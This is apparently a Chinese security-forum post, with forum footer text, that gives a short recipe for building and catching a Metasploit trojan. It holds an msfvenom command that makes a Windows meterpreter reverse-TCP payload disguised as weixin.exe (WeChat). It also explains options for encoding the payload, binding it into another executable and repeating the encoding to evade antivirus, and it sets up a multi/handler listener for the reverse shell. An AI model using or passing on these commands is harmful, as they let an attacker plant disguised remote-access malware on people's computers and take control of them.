145
192
817
高级会员
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe复制代码
-e /指定编码方式对攻击载荷进行重新编码 -x /指定木马捆绑在哪个可执行程序模板上 -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现 -f /指定msf编码器输出程序的格式 -0 /指定处理完毕后的文件输出路径
<p>use exploit/multi/handler</p> <p>set payload windows/shell/reverse_tcp ///选择payload为Windows/shell/reverse_tcp</p> <p>show options ///查看一下哪些选项需要配置</p> <p>set lhost 192.168.111.132 ///设置一下主机地址</p> <p>set lport 9999 ///设置下主机端口,为木马设定的端口</p> <p>run</p>复制代码
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-29 20:41 , Processed in 0.019743 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.